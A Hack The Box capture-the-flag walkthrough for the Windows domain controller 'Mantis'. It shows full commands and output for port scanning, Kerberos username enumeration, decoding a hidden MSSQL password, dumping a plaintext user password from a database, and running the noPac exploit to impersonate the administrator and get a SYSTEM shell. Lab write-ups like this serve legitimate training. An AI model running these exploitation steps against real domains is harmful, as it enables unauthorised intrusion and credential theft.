HTB - Mantis

Machine Info

Mantis can definitely be one of the more challenging machines for some users. For successful exploitation, a fair bit of knowledge or research of Windows Servers and the domain controller system is required.

Enumeration

Scope

IP Address: 10.10.10.52

Nmap Scan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn 

PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
1337/tcp  open  waste
1433/tcp  open  ms-sql-s
8080/tcp  open  http-proxy
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown


┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000

PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap


┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p53,88,139,389,445,1433,8080 -sCV $ip -Pn -oN Nmap/script-scan

PORT     STATE SERVICE      VERSION
53/tcp   open  domain       Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-13 04:21:49Z)
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
PORT     STATE SERVICE VERSION
1337/tcp open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
1433/tcp open  ms-sql-s     Microsoft SQL Server 2014 12.00.2000.00; RTM
|_ssl-date: 2024-07-13T04:22:12+00:00; +4s from scanner time.
| ms-sql-ntlm-info: 
|   10.10.10.52:1433: 
|     Target_Name: HTB
|     NetBIOS_Domain_Name: HTB
|     NetBIOS_Computer_Name: MANTIS
|     DNS_Domain_Name: htb.local
|     DNS_Computer_Name: mantis.htb.local
|     DNS_Tree_Name: htb.local
|_    Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2024-07-13T04:14:57
| Not valid after:  2054-07-13T04:14:57
| MD5:   5cef:fbd5:1743:b5a4:ac1d:4a7a:92eb:e950
|_SHA-1: 8a80:3d0c:f5f9:f67c:e526:9d2a:d5b9:f582:b093:685c
| ms-sql-info: 
|   10.10.10.52:1433: 
|     Version: 
|       name: Microsoft SQL Server 2014 RTM
|       number: 12.00.2000.00
|       Product: Microsoft SQL Server 2014
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
8080/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Tossed Salad - Blog
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-time: 
|   date: 2024-07-13T04:22:04
|_  start_date: 2024-07-13T04:14:30
| smb-os-discovery: 
|   OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: mantis
|   NetBIOS computer name: MANTIS\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: mantis.htb.local
|_  System time: 2024-07-13T00:22:05-04:00
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required
|_clock-skew: mean: 48m05s, deviation: 1h47m22s, median: 3s

* Open ports: 53,88,139,389,445,1433,8080
* UDP Open ports: 53,88,123,389
* Services: DNS - RPC - SMB - LDAP - Kerberos - HTTP-PROXY
* Versions: Windows Server 2008 R2 SP1 - Microsoft SQL Server 2014
* Important Notes: FQDN: mantis.htb.local - Domain name: htb.local

DNS Enumeration

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mantis]
└─$ dig axfr HTB.LOCAL @$ip

; <<>> DiG 9.19.19-1-Debian <<>> axfr HTB.LOCAL @10.10.10.52
;; global options: +cmd
; Transfer failed.

RPC Enumeration

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mantis]
└─$ rpcclient -U "%" $ip                      
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
result was NT_STATUS_ACCESS_DENIED

SMB Enumeration

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mantis]
└─$ smbclient -N -L //$ip                  
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.52 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mantis]
└─$ crackmapexec smb $ip -u '' -p '' --shares                                             
SMB         10.10.10.52     445    MANTIS           [+] htb.local\: 
SMB         10.10.10.52     445    MANTIS           [-] Error enumerating shares: STATUS_ACCESS_DENIED

Kerberos Enumeration

No username found when enumerating with kerbrute

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mantis]
└─$ kerbrute userenum --dc $ip -d htb.local -t 100 /usr/share/wordlists/seclists/Usernames/jsmith.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 07/13/24 - Ronnie Flathers @ropnop

2024/07/13 00:26:25 >  Using KDC(s):
2024/07/13 00:26:25 >   10.10.10.52:88

2024/07/13 00:27:02 >  Done! Tested 48705 usernames (0 valid) in 36.873 seconds

HTTP Enumeration

http://10.10.10.52:8080

http://10.10.10.52:8080/archive

http://10.10.10.52:1337

ffuf found one directory after fuzzing

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mantis]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt:FUZZ -u http://$ip:1337/FUZZ

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

secure_notes       [Status: 301, Size: 160, Words: 9, Lines: 2, Duration: 82ms]

http://10.10.10.52:1337/secure_notes/

[dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt]

I decoded this weird string in the dev_notes file and the output seems to be a hash but we I checked for its type with hashid it told me it's known hash.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mantis]
└─$ base64 -d <<<NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx
6d2424716c5f53405f504073735730726421

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mantis]
└─$ hashid -m 6d2424716c5f53405f504073735730726421                                       
Analyzing '6d2424716c5f53405f504073735730726421'
[+] Unknown hash

I checked the string length, It has chars that a regular hash (34 or 32) , So it might be hex

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mantis]
└─$ wc -c <<<6d2424716c5f53405f504073735730726421
37

Decode the string from hex format gave me a password

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mantis]
└─$ xxd -r -p <<< 6d2424716c5f53405f504073735730726421
m$$ql_S@_P@ssW0rd!

Initial Access

I didn't have usernames list yet to test the password I found with as kerbrute didn't show me any user when using jsmith.txt wordlist, So I will try bigger list

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mantis]
└─$ kerbrute userenum --dc $ip -d htb.local -t 100 /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        


2024/07/13 01:02:42 >  [+] VALID USERNAME:       James@htb.local
2024/07/13 01:02:44 >  [+] VALID USERNAME:       administrator@htb.local
2024/07/13 01:02:46 >  [+] VALID USERNAME:       mantis@htb.local
2024/07/13 01:02:49 >  [+] VALID USERNAME:       JAMES@htb.local
2024/07/13 01:02:54 >  [+] VALID USERNAME:       Administrator@htb.local
2024/07/13 01:02:59 >  [+] VALID USERNAME:       Mantis@htb.local

We got three users, I will test them immediately

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mantis]
└─$ crackmapexec smb $ip -u users.lst -p 'm$$ql_S@_P@ssW0rd!'

SMB         10.10.10.52     445    MANTIS           [-] htb.local\James:m$$ql_S@_P@ssW0rd! STATUS_LOGON_FAILURE
SMB         10.10.10.52     445    MANTIS           [-] htb.local\Administrator:m$$ql_S@_P@ssW0rd! STATUS_LOGON_FAILURE
SMB         10.10.10.52     445    MANTIS           [-] htb.local\mantis:m$$ql_S@_P@ssW0rd! STATUS_LOGON_FAILURE

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mantis]
└─$ crackmapexec mssql $ip -u users.lst -p 'm$$ql_S@_P@ssW0rd!'

MSSQL       10.10.10.52     1433   MANTIS           [-] ERROR(MANTIS\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Windows authentication.                                               
MSSQL       10.10.10.52     1433   MANTIS           [-] ERROR(MANTIS\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Windows authentication.                                               
MSSQL       10.10.10.52     1433   MANTIS           [-] ERROR(MANTIS\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Windows authentication. 

In the notes we found, it tells us that the username of mssql is admin and orcharddb database name

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mantis]
└─$ impacket-mssqlclient htb.local/admin:'m$$ql_S@_P@ssW0rd!'@$ip -db orcharddb
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: orcharddb
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'orcharddb'.
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (120 7208) 
[!] Press help for extra shell commands
SQL (admin  admin@orcharddb)> 

We don't have admin privileges on the instance

SQL (admin  admin@orcharddb)> select is_srvrolemember('sysadmin')quw
-   
0 

SQL (admin  admin@orcharddb)> SELECT table_name FROM orcharddb.INFORMATION_SCHEMA.TABLES

<snip>
blog_Orchard_Autoroute_AutoroutePartRecord
blog_Orchard_Users_UserPartRecord
blog_Orchard_Roles_PermissionRecord
blog_Orchard_Roles_RoleRecord 
<snip>

SQL (admin  admin@orcharddb)> select UserName,Password,PasswordFormat,HashAlgorithm from blog_Orchard_Users_UserPartRecord
UserName   Password                                                               PasswordFormat   HashAlgorithm   
--------   --------------------------------------------------------------------   --------------   -------------   
admin      AL1337E2D6YHm0iIysVzG8LA76OozgMSlyOJk1Ov5WCGK+lgKY6vrQuswfWHKZn2+A==   Hashed           PBKDF2          
James      J@m3s_P@ssW0rd!                                                        Plaintext        Plaintext   

I got the password of James user, Let's test it against smb and mssql services

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mantis]
└─$ crackmapexec smb $ip -u 'james' -p 'J@m3s_P@ssW0rd!' 

SMB         10.10.10.52     445    MANTIS           [+] htb.local\james:J@m3s_P@ssW0rd! 

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mantis]
└─$ crackmapexec mssql $ip -u 'james' -p 'J@m3s_P@ssW0rd!' 

MSSQL       10.10.10.52     1433   MANTIS           [+] htb.local\james:J@m3s_P@ssW0rd! 

I fire up bloodhound.py to enumerate the domain and feed its data to bloodhound GUI

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mantis]
└─$ bloodhound-python -u 'james' -p 'J@m3s_P@ssW0rd!' -ns $ip -d htb.local -c all

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mantis]
└─$ zip mantis.zip *.json

I found that user James CanRDP to the machine but when check RDP port I found it closed

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mantis]
└─$ nmap -p3389 $ip                           
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-13 01:35 EDT
Nmap scan report for 10.10.10.52
Host is up (0.067s latency).

PORT     STATE  SERVICE
3389/tcp closed ms-wbt-server

Privilege Escalation

I couldn't go further anymore, So I got a hint from community that there is a CVE affected kerberos which allow us to get golden ticket without being an admin (MS14-068).

Useful post to configure our kali to work properly:

Knock and Pass: Kerberos Exploitation

POC for the vulnerability:

GitHub - mubix/pykek: Kerberos Exploitation KitGitHub

Follow up the post above to get system access but It didn't work for me cause it's an old vulnerability and I couldn't run this python script, So I used unintended path using noPac exploit to get system account.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Mantis]
└─$ python ./noPac/noPac.py htb.local/james:'J@m3s_P@ssW0rd!' -dc-ip $ip -dc-host mantis -shell --impersonate administrator -use-ldap

███    ██  ██████  ██████   █████   ██████ 
████   ██ ██    ██ ██   ██ ██   ██ ██      
██ ██  ██ ██    ██ ██████  ███████ ██      
██  ██ ██ ██    ██ ██      ██   ██ ██      
██   ████  ██████  ██      ██   ██  ██████ 
    
<snip>

C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
77e6fa689d3c8935260c6b23e4b82be1

C:\Windows\system32>type C:\Users\james\Desktop\user.txt
35d8d3e946138xxxxxxxxxxxxxxxxxxxxxx

User Flag: 35d8d3e946138xxxxxxxxxxxxx

C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
77e6fa689d3c89352xxxxxxxxxxxxxxxxxx

Root Flag: 77e6fa689d3c89352xxxxxxxxxxxxxxx